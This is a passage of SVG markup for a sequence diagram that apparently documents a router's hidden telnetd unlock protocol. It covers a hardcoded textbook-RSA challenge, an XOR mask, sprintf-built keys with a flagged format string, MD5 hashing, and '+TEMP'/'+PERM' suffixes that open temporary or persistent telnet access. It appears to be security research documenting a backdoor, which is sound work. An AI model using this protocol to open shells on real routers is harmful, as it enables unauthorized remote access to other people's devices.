font-style="normal" font-weight="normal" text-decoration="normal" x="765.1752997102226" y="730.8621267240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 567.2144438608085 736.8935864040001 L 635.0683652608085 736.8935864040001 L 635.0683652608085 756.4958303640001 L 587.1685229688085 756.4958303640001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(574.7537684608085,756.4958303640001) translate(-574.7537684608085,-756.4958303640001)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 587.3193094608085 750.2130598640001 L 574.7537684608085 756.4958303640001 L 587.3193094608085 762.778600864 Z"/></g></g><g><g><rect fill="white" stroke="none" x="600.1361612808087" y="779.113804164" width="425.3069313994043" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="794.192453364" width="409.67358865648436" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="809.271102564" width="364.4569291105859" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="824.349751764" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="839.4284009639999" width="400.72359170824217" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="792.684588444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Encrypt </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="663.4812907225762" y="792.684588444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="807.7979563719903" y="792.684588444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="848.2646235472832" y="792.684588444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_encrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="807.763237644" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">using the hardcoded, 1024-bit public RSA key, with the</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="602.3979586608086" y="822.841886844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_NO_PADDING</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="749.9479617125664" y="822.841886844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> option set ("Textbook RSA").</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="837.920536044" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="852.9991852439999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the 128-byte result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="812.8646182067071" y="852.9991852439999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 574.7537684608085 859.0306449240001 L 642.6076898608086 859.0306449240001 L 642.6076898608086 878.6328888840001 L 594.7078475688086 878.6328888840001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(582.2930930608086,878.6328888840001) translate(-582.2930930608086,-878.6328888840001)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 594.8586340608086 872.3501183840001 L 582.2930930608086 878.6328888840001 L 594.8586340608086 884.915659384 Z"/></g></g><g><g><rect fill="white" stroke="none" x="132.88757376611133" y="901.250862684" width="369.2069291105859" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="135.14937114611132" y="914.821646964" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send 128-byte </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="247.53270244493945" y="914.821646964" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="433.2660398472832" y="914.821646964" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Client</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 567.2144438608085 920.853106644 L 80.18238729 920.853106644" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(67.76763278199999,920.853106644) translate(-67.76763278199999,-920.853106644)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 80.33317378199999 914.5703361440001 L 67.76763278199999 920.853106644 L 80.33317378199999 927.135877144 Z"/></g></g><g><g><rect fill="white" stroke="none" x="600.1361612808087" y="943.4710804440001" width="354.3735918036096" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="958.5497296440001" width="369.65692796617674" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="973.628378844" width="135.99026431947877" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="602.3979586608086" y="957.0418647240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="636.9479578978692" y="957.0418647240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="641.6146244055901" y="957.0418647240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="785.9312900550042" y="957.0418647240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with the first 31 bytes</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="972.1205139240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="621.2146262175713" y="972.1205139240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DECRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="795.7979544646416" y="972.1205139240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and store the result in</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="987.199163124" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="729.1979617125664" y="987.199163124" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 582.2930930608086 993.2306228040001 L 642.6076898608086 993.2306228040001 L 642.6076898608086 1012.8328667640001 L 594.7078475688086 1012.8328667640001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(582.2930930608086,1012.8328667640001) translate(-582.2930930608086,-1012.8328667640001)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 594.8586340608086 1006.5500962640001 L 582.2930930608086 1012.8328667640001 L 594.8586340608086 1019.115637264 Z"/></g></g><g><g><rect fill="white" stroke="none" x="93.150025602" y="1035.450840564" width="339.22359743028807" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="93.150025602" y="1050.529489764" width="295.4069260588281" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="93.150025602" y="1065.6081389639999" width="321.3236001959436" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="93.150025602" y="1080.6867881639998" width="320.07358255296873" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="93.150025602" y="1095.7654373639998" width="343.94026651292967" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="93.150025602" y="1110.8440865639998" width="174.80692615419557" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="95.411822982" y="1049.021624844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="107.26182336346973" y="1049.021624844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> the Client possesses the </text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="295.8784920646416" y="1049.021624844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PRIVATE KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="401.09515923993456" y="1049.021624844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, or,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="95.411822982" y="1064.100274044" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">perhaps, a database of such keys, each</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="95.411822982" y="1079.1789232439999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">indexed by an </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="203.74515885846483" y="1079.1789232439999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DEVICE_IDENTIFYING_HASH</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="407.54516191022265" y="1079.1789232439999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="95.411822982" y="1094.2575724439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">then they may now proceed to decrypt the</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="95.411822982" y="1109.3362216439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="281.14516038434374" y="1109.3362216439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and store  the result</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="95.411822982" y="1124.4148708439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="116.71182221906055" y="1124.4148708439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="261.0284878684746" y="1124.4148708439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 67.76763278199999 1130.4463305240001 L 135.621554182 1130.4463305240001 L 135.621554182 1150.048574484 L 87.72171189000001 1150.048574484" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(75.30695738200001,1150.048574484) translate(-75.30695738200001,-1150.048574484)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 87.872498382 1143.765803984 L 75.30695738200001 1150.048574484 L 87.872498382 1156.331344984 Z"/></g></g><g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1172.6665482839999" width="249.39026346117188" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1187.7451974839998" width="460.2569293013208" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1202.8238466839998" width="430.456932448446" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1217.9024958839998" width="100.89026346117187" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1232.9811450839998" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1248.0597942839997" width="184.54025735765626" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1186.2373325639999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Create two new strings by calling</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="609.9372832608086" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">sprintf(</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="671.9872824978692" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="787.5872809719903" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, "</text><text fill="purple" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="803.6706149411065" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">%s</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="827.1039473843438" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+TEMP</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="879.1539466214043" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="895.2372805905205" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1022.0372836422783" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1028.7372834515436" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="609.9372832608086" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">sprintf(</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="671.9872824978692" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="788.820618374334" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, "</text><text fill="purple" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="804.9039523434502" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">%s</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="828.3372847866875" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+PERM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="881.6206176113946" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="897.7039515805108" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1024.5039546322687" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1031.2039544415338" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1231.4732801639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">respectively. </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1246.5519293639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1261.6305785639997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">(Note the format string.)</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 582.2930930608086 1267.662038244 L 650.1470144608086 1267.662038244 L 650.1470144608086 1287.264282204 L 602.2471721688086 1287.264282204" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(589.8324176608086,1287.264282204) translate(-589.8324176608086,-1287.264282204)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 602.3979586608086 1280.981511704 L 589.8324176608086 1287.264282204 L 602.3979586608086 1293.547052704 Z"/></g></g><g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1309.882256004" width="491.306927584707" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1324.960905204" width="436.6069253912561" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1340.039554404" width="96.22359170824218" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Compute the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="710.2872817349297" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MD5</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="747.2872817349297" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> hashes of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="827.3539473843438" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="942.9539458584649" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="979.8872802090508" y="1323.453040284" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1338.531689484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store the 16-byte results as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="849.3206145596367" y="1338.531689484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="924.2539489102227" y="1338.531689484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="961.1872832608086" y="1338.531689484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1037.3539473843439" y="1338.531689484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1353.610338684" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">respectively.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 589.8324176608086 1359.6417983640001 L 650.1470144608086 1359.6417983640001 L 650.1470144608086 1379.244042324 L 602.2471721688086 1379.244042324" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(589.8324176608086,1379.244042324) translate(-589.8324176608086,-1379.244042324)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 602.3979586608086 1372.961271824 L 589.8324176608086 1379.244042324 L 602.3979586608086 1385.526812824 Z"/></g></g><g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1401.862016124" width="364.50693216234373" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1416.940665324" width="233.90692891985108" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1432.019314524" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1447.097963724" width="358.4235962858789" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1462.176612924" width="271.9569329252832" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1477.255262124" width="359.02360429674314" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1492.333911324" width="388.7736023893945" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1507.412560524" width="387.0569313994043" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1522.4912097239999" width="101.60693063646484" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1537.5698589239998" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="100.68935020199999" y="1552.6485081239998" width="214.17359104067017" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1415.432800404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">The Client is now expected to append one of two</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1430.511449604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">suffixes to </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="183.06781628317185" y="1430.511449604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="327.3844819325859" y="1430.511449604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">:</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1445.590098804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1460.668748004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">- "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="119.66781475729296" y="1460.668748004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+TEMP</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="171.7178139943535" y="1460.668748004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", to launch a </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="274.55114987081834" y="1460.668748004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="334.46781780905076" y="1460.668748004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> session that will</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1475.747397204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   last until the router is rebooted, </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="italic" font-weight="normal" text-decoration="normal" x="355.36781933492966" y="1475.747397204" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">or</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1490.826046404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">-  "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="124.33448078817675" y="1490.826046404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+PERM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="177.61781361288377" y="1490.826046404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", to write a flag to a physical volume,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1505.904695604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   which the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="193.11781170553513" y="1505.904695604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd_startup</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="321.21781780905076" y="1505.904695604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> daemon will check for</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1520.983344804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   when the system is rebooted, and launch </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="425.56781628317185" y="1520.983344804" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">telnetd</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1536.0619940039999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">   if it finds it.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1551.1406432039998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="102.95114758199999" y="1566.2192924039998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result in </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="239.4178071278984" y="1566.2192924039998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="307.9344773549492" y="1566.2192924039998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 75.30695738200001 1572.2507520840002 L 143.160878782 1572.2507520840002 L 143.160878782 1591.852996044 L 95.26103649 1591.852996044" stroke-miterlimit="10" stroke-width="1.2565541" 